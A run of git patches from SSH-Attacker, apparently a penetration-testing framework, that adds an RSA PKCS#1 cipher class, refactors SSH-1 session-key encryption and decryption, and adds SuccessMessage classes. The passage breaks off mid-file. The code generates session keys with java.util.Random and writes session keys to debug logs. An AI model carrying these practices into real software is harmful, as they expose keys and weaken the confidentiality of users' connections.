b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -56,7 +56,7 @@ private void serializeSupportedAuthMask() { } private void serializCRCChecksum() { - CRC crc32 = new CRC(32, 0x0104C11DB7L, 0, true, true, 0); + CRC crc32 = new CRC(); byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(getAlreadySerialized()), 4); appendBytes(checksum); LOGGER.debug("CRC: " + ArrayConverter.bytesToRawHexString(checksum)); From 1af4978b7fb8421b85b633533ac0fca46032f4b2 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 10 Sep 2023 13:15:10 +0200 Subject: [PATCH 077/176] Create RsaPcks1Cipher and simplifieng rsa encryption. remove old debug-code --- .idea/misc.xml | 3 +- .../core/crypto/cipher/CipherFactory.java | 4 + .../core/crypto/cipher/RsaPkcs1Cipher.java | 88 ++++++++ .../ClientSessionKeyMessageHandler.java | 201 ++---------------- .../ClientSessionKeyMessagePreparator.java | 85 +------- 5 files changed, 118 insertions(+), 263 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java diff --git a/.idea/misc.xml b/.idea/misc.xml index 93a01a3e3..1465bc128 100644 --- a/.idea/misc.xml +++ b/.idea/misc.xml @@ -1,3 +1,4 @@ + @@ -7,5 +8,5 @@ - + \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java index 4ed7a060d..509c537fe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java @@ -63,5 +63,9 @@ public static AbstractCipher getOaepCipher(KeyExchangeAlgorithm keyExchangeAlgor } } + public static AbstractCipher getRsaPkcs1Cipher(Key key) { + return new RsaPkcs1Cipher(key); + } + private CipherFactory() {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java new file mode 100644 index 000000000..cf6af0d29 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java @@ -0,0 +1,88 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.crypto.cipher; + +import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import java.security.InvalidKeyException; +import java.security.Key; +import java.security.NoSuchAlgorithmException; +import javax.crypto.*; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaPkcs1Cipher extends AbstractCipher { + + private static final Logger LOGGER = LogManager.getLogger(); + + private Cipher cipher; + + private final Key key; + + public RsaPkcs1Cipher(Key key) { + this.key = key; + } + + @Override + public byte[] encrypt(byte[] data) throws CryptoException { + try { + prepareCipher(Cipher.ENCRYPT_MODE); + return cipher.doFinal(data); + } catch (IllegalBlockSizeException | BadPaddingException e) { + throw new CryptoException("Could not encrypt data with RSA/ECB/PKCS1Padding.", e); + } + } + + @Override + public byte[] encrypt(byte[] plainData, byte[] iv) throws CryptoException { + throw new UnsupportedOperationException("Encryption with IV not supported."); + } + + @Override + public byte[] encrypt(byte[] plainData, byte[] iv, byte[] additionalAuthenticatedData) + throws CryptoException { + throw new UnsupportedOperationException("AEAD encryption not supported."); + } + + @Override + public byte[] decrypt(byte[] encryptedData) throws CryptoException { + try { + prepareCipher(Cipher.DECRYPT_MODE); + return cipher.doFinal(encryptedData); + } catch (IllegalBlockSizeException | BadPaddingException e) { + throw new CryptoException("Could not decrypt data with RSA/ECB/PKCS1Padding.", e); + } + } + + @Override + public byte[] decrypt(byte[] encryptedData, byte[] iv) throws CryptoException { + throw new UnsupportedOperationException("Decryption with IV not supported."); + } + + @Override + public byte[] decrypt(byte[] encryptedData, byte[] iv, byte[] additionalAuthenticatedData) + throws CryptoException, AEADBadTagException { + throw new UnsupportedOperationException("AEAD decryption not supported."); + } + + @Override + public EncryptionAlgorithm getAlgorithm() { + return null; + } + + private void prepareCipher(int mode) { + try { + Cipher cipher; + cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + cipher.init(mode, key); + this.cipher = cipher; + } catch (NoSuchPaddingException | NoSuchAlgorithmException | InvalidKeyException e) { + LOGGER.error("RSA PCKS1 Cipher creation failed with error: " + e); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 361458287..695fea7c3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -9,19 +9,14 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; +import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; -import java.security.InvalidKeyException; -import java.security.NoSuchAlgorithmException; import java.util.Arrays; -import javax.crypto.BadPaddingException; -import javax.crypto.Cipher; -import javax.crypto.IllegalBlockSizeException; -import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -33,11 +28,6 @@ public ClientSessionKeyMessageHandler(SshContext context) { super(context); } - /*public HybridKeyExchangeReplyMessageHandler( - SshContext context, HybridKeyExchangeReplyMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(ClientSessionKeyMessage message) { sshContext.setChosenCipherMethod(message.getChosenCipherMethod()); @@ -54,26 +44,11 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) { sessionKey = Arrays.copyOfRange(sessionKey, 1, sessionKey.length); } - CustomRsaPublicKey hostPublickey; - CustomRsaPublicKey serverPublicKey; - CustomRsaPrivateKey hostPrivateKey; CustomRsaPrivateKey serverPrivatKey; SshPublicKey serverkey = sshContext.getServerKey(); - - if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { - serverPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); - } else { - throw new RuntimeException(); - } - SshPublicKey hostKey = sshContext.getHostKey().orElseThrow(); - if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { - hostPublickey = (CustomRsaPublicKey) hostKey.getPublicKey(); - } else { - throw new RuntimeException(); - } if (!serverkey.getPrivateKey().isPresent()) { LOGGER.fatal("ServerPrivateKey not Present"); @@ -93,106 +68,35 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) { throw new RuntimeException(); } - /*Sanity Check Area*/ - - Cipher myCipher = null; - try { - byte[] dummy = new byte[] {0, 1, 2, 3}; - byte[] enc_dummy; - byte[] dec_dummy; - myCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); - myCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); - enc_dummy = myCipher.doFinal(dummy); - - myCipher.init(Cipher.DECRYPT_MODE, hostPrivateKey); - dec_dummy = myCipher.doFinal(enc_dummy); - - LOGGER.debug("DUMMY: {} ECN_DUMMY: {} DEC_DUMMY: {}", dummy, enc_dummy, dec_dummy); - - } catch (NoSuchAlgorithmException e) { - throw new RuntimeException(e); - } catch (NoSuchPaddingException e) { - throw new RuntimeException(e); - } catch (IllegalBlockSizeException e) { - throw new RuntimeException(e); - } catch (BadPaddingException e) { - throw new RuntimeException(e); - } catch (InvalidKeyException e) { - throw new RuntimeException(e); - } - - /*Sanity Check Area*/ - AbstractCipher innerEncryption; AbstractCipher outerEncryption; - if (hostPublickey != null && serverPublicKey != null) { + if (hostPrivateKey != null) { try { - if (hostPublickey.getModulus().bitLength() - > serverPublicKey.getModulus().bitLength()) { + if (hostPrivateKey.getModulus().bitLength() + > serverPrivatKey.getModulus().bitLength()) { LOGGER.debug( "Hostkeylenght: {}, ServerKeyLenght: {}", - hostPublickey.getModulus().bitLength(), - serverPublicKey.getModulus().bitLength()); + hostPrivateKey.getModulus().bitLength(), + serverPrivatKey.getModulus().bitLength()); - /* outerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); + outerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); sessionKey = outerEncryption.decrypt(sessionKey); - innerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); - sessionKey = innerEncryption.decrypt(sessionKey);*/ - - /* Alternative Imlementation */ - - Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); - encryptCipher.init(Cipher.DECRYPT_MODE, hostPrivateKey); - sessionKey = encryptCipher.doFinal(sessionKey); - - encryptCipher.init(Cipher.DECRYPT_MODE, serverPrivatKey); - sessionKey = encryptCipher.doFinal(sessionKey); - - /* Alternative Imlementation */ + innerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); + sessionKey = innerEncryption.decrypt(sessionKey); } else { - /* - outerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, serverPrivatKey); - sessionKey = outerEncryption.decrypt(sessionKey); - - innerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, hostPrivateKey); - sessionKey = innerEncryption.decrypt(sessionKey); - */ - - /* Alternative Imlementation */ - - Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); - encryptCipher.init(Cipher.DECRYPT_MODE, serverPrivatKey); - sessionKey = encryptCipher.doFinal(sessionKey); - - encryptCipher.init(Cipher.DECRYPT_MODE, hostPrivateKey); - sessionKey = encryptCipher.doFinal(sessionKey); - - /* Alternative Imlementation */ + outerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); + sessionKey = outerEncryption.decrypt(sessionKey); + innerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); + sessionKey = innerEncryption.decrypt(sessionKey); } - } catch (NoSuchPaddingException e) { - throw new RuntimeException(e); - } catch (IllegalBlockSizeException e) { - throw new RuntimeException(e); - } catch (NoSuchAlgorithmException e) { - throw new RuntimeException(e); - } catch (BadPaddingException e) { - throw new RuntimeException(e); - } catch (InvalidKeyException e) { + } catch (CryptoException e) { throw new RuntimeException(e); } } @@ -201,79 +105,4 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) { LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); return sessionKey; } - - /*private void setRemoteValues(ServerPublicKeyMessage message) { - sshContext - .getChooser() - .getHybridKeyExchange() - .getKeyAgreement() - .setRemotePublicKey(message.getPublicKey().getValue()); - LOGGER.info( - "RemoteKey Agreement = " - + ArrayConverter.bytesToRawHexString(message.getPublicKey().getValue())); - sshContext - .getChooser() - .getHybridKeyExchange() - .getKeyEncapsulation() - .setEncryptedSharedSecret(message.getCombinedKeyShare().getValue()); - LOGGER.info( - "Ciphertext Encapsulation = " - + ArrayConverter.bytesToRawHexString( - message.getCombinedKeyShare().getValue())); - byte[] combined; - switch (sshContext.getChooser().getHybridKeyExchange().getCombiner()) { - case CLASSICAL_CONCATENATE_POSTQUANTUM: - combined = - KeyExchangeUtil.concatenateHybridKeys( - message.getPublicKey().getValue(), - message.getCombinedKeyShare().getValue()); - sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); - break; - case POSTQUANTUM_CONCATENATE_CLASSICAL: - combined = - KeyExchangeUtil.concatenateHybridKeys( - message.getCombinedKeyShare().getValue(), - message.getPublicKey().getValue()); - sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); - break; - default: - LOGGER.warn( - "Combiner" - + sshContext.getChooser().getHybridKeyExchange().getCombiner() - + " is not supported."); - break; - } - }*/ - - /*@Override - public SshMessageParser getParser(byte[] array) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessageParser( - array, kex.getCombiner(), kex.getPkAgreementLength(), kex.getCiphertextLength()); - } - - @Override - public SshMessageParser getParser( - byte[] array, int startPosition) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessageParser( - array, - startPosition, - kex.getCombiner(), - kex.getPkAgreementLength(), - kex.getCiphertextLength()); - } - - @Override - public SshMessagePreparator getPreparator() { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessagePreparator( - context.getChooser(), message, kex.getCombiner()); - } - - @Override - public SshMessageSerializer getSerializer() { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new HybridKeyExchangeReplyMessageSerializer(message, kex.getCombiner()); - }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 447bc30ea..f811c6644 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -11,21 +11,17 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.util.List; import java.util.Random; -import javax.crypto.BadPaddingException; -import javax.crypto.Cipher; -import javax.crypto.IllegalBlockSizeException; -import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -35,8 +31,6 @@ public class ClientSessionKeyMessagePreparator private static final Logger LOGGER = LogManager.getLogger(); private HybridKeyExchangeCombiner combiner; - private SshPublicKey serverKey; - public ClientSessionKeyMessagePreparator( Chooser chooser, ClientSessionKeyMessage message, HybridKeyExchangeCombiner combiner) { super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_SESSION_KEY); @@ -138,9 +132,6 @@ private void prepareSessionKey() { CustomRsaPublicKey hostPublickey; CustomRsaPublicKey serverPublicKey; - CustomRsaPrivateKey hostPrivateKey; - CustomRsaPrivateKey serverPrivatKey; - SshPublicKey serverkey = chooser.getContext().getSshContext().getServerKey(); if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { @@ -149,17 +140,6 @@ private void prepareSessionKey() { throw new RuntimeException(); } - /* if (!serverkey.getPrivateKey().isPresent()) { - LOGGER.fatal("ServerPrivateKey not Present"); - } - - if (serverkey.getPrivateKey().isPresent() - && serverkey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { - serverPrivatKey = (CustomRsaPrivateKey) serverkey.getPrivateKey().get(); - } else { - throw new RuntimeException(); - }*/ - SshPublicKey hostKey = chooser.getContext().getSshContext().getHostKey().orElseThrow(); if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { @@ -167,13 +147,6 @@ private void prepareSessionKey() { } else { throw new RuntimeException(); } - /* - if (hostKey.getPrivateKey().isPresent() - && hostKey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { - hostPrivateKey = (CustomRsaPrivateKey) hostKey.getPrivateKey().get(); - } else { - throw new RuntimeException(); - }*/ AbstractCipher innerEncryption; AbstractCipher outerEncryption; @@ -189,27 +162,12 @@ private void prepareSessionKey() { hostPublickey.getModulus().bitLength(), serverPublicKey.getModulus().bitLength()); - /* innerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, hostPublickey); + innerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPublickey); sessionKey = innerEncryption.encrypt(sessionKey); - outerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, serverPublicKey); - - sessionKey = outerEncryption.encrypt(sessionKey);*/ - - /* Alternative Imlementation */ + outerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPublicKey); - Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); - encryptCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); - sessionKey = encryptCipher.doFinal(sessionKey); - - encryptCipher.init(Cipher.ENCRYPT_MODE, serverPublicKey); - sessionKey = encryptCipher.doFinal(sessionKey); - - /* Alternative Imlementation */ + sessionKey = outerEncryption.encrypt(sessionKey); LOGGER.debug("Scucessfull Decrypted, Sanity-Check passed"); } else { @@ -219,42 +177,17 @@ private void prepareSessionKey() { hostPublickey.getModulus().bitLength(), serverPublicKey.getModulus().bitLength()); - /* innerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, serverPublicKey); + innerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPublicKey); sessionKey = innerEncryption.encrypt(sessionKey); - outerEncryption = - CipherFactory.getOaepCipher( - KeyExchangeAlgorithm.RSA1024_PCKS1, hostPublickey); - - sessionKey = outerEncryption.encrypt(sessionKey);*/ - - /* Alternative Imlementation */ - - // shorter - Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); - encryptCipher.init(Cipher.ENCRYPT_MODE, serverPublicKey); - sessionKey = encryptCipher.doFinal(sessionKey); + outerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPublickey); - // longer - encryptCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); - sessionKey = encryptCipher.doFinal(sessionKey); - - /* Alternative Imlementation */ + sessionKey = outerEncryption.encrypt(sessionKey); LOGGER.debug("Scucessfull Decrypted, Sanity-Check passed"); } - } catch (NoSuchPaddingException e) { - throw new RuntimeException(e); - } catch (IllegalBlockSizeException e) { - throw new RuntimeException(e); - } catch (NoSuchAlgorithmException e) { - throw new RuntimeException(e); - } catch (BadPaddingException e) { - throw new RuntimeException(e); - } catch (InvalidKeyException e) { + } catch (CryptoException e) { throw new RuntimeException(e); } } From 5c865c6df77b60bdb727b1a1856a1f48453e5808 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 10 Sep 2023 13:28:06 +0200 Subject: [PATCH 078/176] added Error-Handling and code cleanup --- .../ClientSessionKeyMessageHandler.java | 57 ++++++++++--------- .../ssh1/message/ClientSessionKeyMessage.java | 2 +- .../ClientSessionKeyMessagePreparator.java | 28 ++++----- 3 files changed, 42 insertions(+), 45 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 695fea7c3..4bd53e314 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -32,12 +32,18 @@ public ClientSessionKeyMessageHandler(SshContext context) { public void adjustContext(ClientSessionKeyMessage message) { sshContext.setChosenCipherMethod(message.getChosenCipherMethod()); sshContext.setChosenProtocolFlags(message.getChosenProtocolFlags()); - byte[] decryptedSessionkey = decryptSessionKey(message); + + byte[] decryptedSessionkey; + try { + decryptedSessionkey = decryptSessionKey(message); + } catch (CryptoException e) { + throw new RuntimeException(e); + } sshContext.setSessionKey(decryptedSessionkey); } - private byte[] decryptSessionKey(ClientSessionKeyMessage message) { + private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoException { byte[] sessionKey = message.getEncryptedSessioKey().getValue(); LOGGER.debug("Enc. session Key: {}", ArrayConverter.bytesToHexString(sessionKey)); if (sessionKey[0] == 0) { @@ -50,55 +56,50 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) { SshPublicKey serverkey = sshContext.getServerKey(); SshPublicKey hostKey = sshContext.getHostKey().orElseThrow(); - if (!serverkey.getPrivateKey().isPresent()) { - LOGGER.fatal("ServerPrivateKey not Present"); - } if (serverkey.getPrivateKey().isPresent() && serverkey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { serverPrivatKey = (CustomRsaPrivateKey) serverkey.getPrivateKey().get(); } else { - throw new RuntimeException(); + throw new CryptoException("Private-Server-Key is Missing"); } if (hostKey.getPrivateKey().isPresent() && hostKey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { hostPrivateKey = (CustomRsaPrivateKey) hostKey.getPrivateKey().get(); } else { - throw new RuntimeException(); + throw new CryptoException("Private-Host-Key is Missing"); } AbstractCipher innerEncryption; AbstractCipher outerEncryption; - if (hostPrivateKey != null) { - try { + try { - if (hostPrivateKey.getModulus().bitLength() - > serverPrivatKey.getModulus().bitLength()) { + if (hostPrivateKey.getModulus().bitLength() + > serverPrivatKey.getModulus().bitLength()) { - LOGGER.debug( - "Hostkeylenght: {}, ServerKeyLenght: {}", - hostPrivateKey.getModulus().bitLength(), - serverPrivatKey.getModulus().bitLength()); + LOGGER.debug( + "Hostkeylenght: {}, ServerKeyLenght: {}", + hostPrivateKey.getModulus().bitLength(), + serverPrivatKey.getModulus().bitLength()); - outerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); - sessionKey = outerEncryption.decrypt(sessionKey); + outerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); + sessionKey = outerEncryption.decrypt(sessionKey); - innerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); - sessionKey = innerEncryption.decrypt(sessionKey); + innerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); + sessionKey = innerEncryption.decrypt(sessionKey); - } else { - outerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); - sessionKey = outerEncryption.decrypt(sessionKey); + } else { + outerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); + sessionKey = outerEncryption.decrypt(sessionKey); - innerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); - sessionKey = innerEncryption.decrypt(sessionKey); - } - - } catch (CryptoException e) { - throw new RuntimeException(e); + innerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); + sessionKey = innerEncryption.decrypt(sessionKey); } + + } catch (CryptoException e) { + throw new RuntimeException(e); } // Set Sessionkey diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java index 2d0bfe401..0c4bc1819 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java @@ -128,7 +128,7 @@ public SshMessageParser getParser( @Override public SshMessagePreparator getPreparator(SshContext context) { HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new ClientSessionKeyMessagePreparator(context.getChooser(), this, kex.getCombiner()); + return new ClientSessionKeyMessagePreparator(context.getChooser(), this); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index f811c6644..b75213704 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -22,6 +22,7 @@ import java.security.NoSuchAlgorithmException; import java.util.List; import java.util.Random; + import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -29,12 +30,10 @@ public class ClientSessionKeyMessagePreparator extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - private HybridKeyExchangeCombiner combiner; public ClientSessionKeyMessagePreparator( - Chooser chooser, ClientSessionKeyMessage message, HybridKeyExchangeCombiner combiner) { + Chooser chooser, ClientSessionKeyMessage message) { super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_SESSION_KEY); - this.combiner = combiner; } private void prepareAntiSpoofingCookie() { @@ -67,7 +66,7 @@ private void prepareSessionID() { cookie = chooser.getContext().getSshContext().getAntiSpoofingCookie(); - MessageDigest md = null; + MessageDigest md; try { md = MessageDigest.getInstance("MD5"); } catch (NoSuchAlgorithmException e) { @@ -108,26 +107,18 @@ private void prepareProtoclFlags() { getObject().setProtocolFlagMask(flagMask); } - private void prepareSessionKey() { + private void prepareSessionKey() throws CryptoException { Random random = new Random(); byte[] sessionKey = new byte[32]; random.nextBytes(sessionKey); byte[] sessionID = getObject().getSshv1SessionID().getValue(); - LOGGER.debug( - "Session-ID {} | SessionKey before {}", - ArrayConverter.bytesToHexString(sessionID), - ArrayConverter.bytesToHexString(sessionKey)); int i = 0; for (byte sesseionByte : sessionID) { sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); } - LOGGER.debug( - "Session-ID {} | SessionKey after {}", - ArrayConverter.bytesToHexString(sessionID), - ArrayConverter.bytesToHexString(sessionKey)); CustomRsaPublicKey hostPublickey; CustomRsaPublicKey serverPublicKey; @@ -137,7 +128,7 @@ private void prepareSessionKey() { if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { serverPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); } else { - throw new RuntimeException(); + throw new CryptoException("Public-Server-Key is Missing"); } SshPublicKey hostKey = @@ -145,7 +136,7 @@ private void prepareSessionKey() { if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { hostPublickey = (CustomRsaPublicKey) hostKey.getPublicKey(); } else { - throw new RuntimeException(); + throw new CryptoException("Public-Host-Key is Missing"); } AbstractCipher innerEncryption; @@ -205,6 +196,11 @@ public void prepareMessageSpecificContents() { prepareEncryptionAlgorithm(); prepareProtoclFlags(); prepareAntiSpoofingCookie(); - prepareSessionKey(); + try { + prepareSessionKey(); + } catch (CryptoException e) { + LOGGER.fatal("Error while encrypting Session key {}.",e.getMessage()); + throw new RuntimeException(e); + } } } From 4d598bcecfe8e1364d1cc4dda891b32ba89c2292 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 11 Sep 2023 21:08:58 +0200 Subject: [PATCH 079/176] Adding SuccessMessage --- .../ssh1/handler/SuccessMessageHandler.java | 33 +++++++++++++ .../protocol/ssh1/message/SuccessMessage.java | 47 +++++++++++++++++++ .../ssh1/parser/SuccessMessageParser.java | 31 ++++++++++++ .../preparator/SuccessMessagePreparator.java | 29 ++++++++++++ .../serializer/SuccessMessageSerializier.java | 25 ++++++++++ 5 files changed, 165 insertions(+) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessage.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java new file mode 100644 index 000000000..454d7802f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package 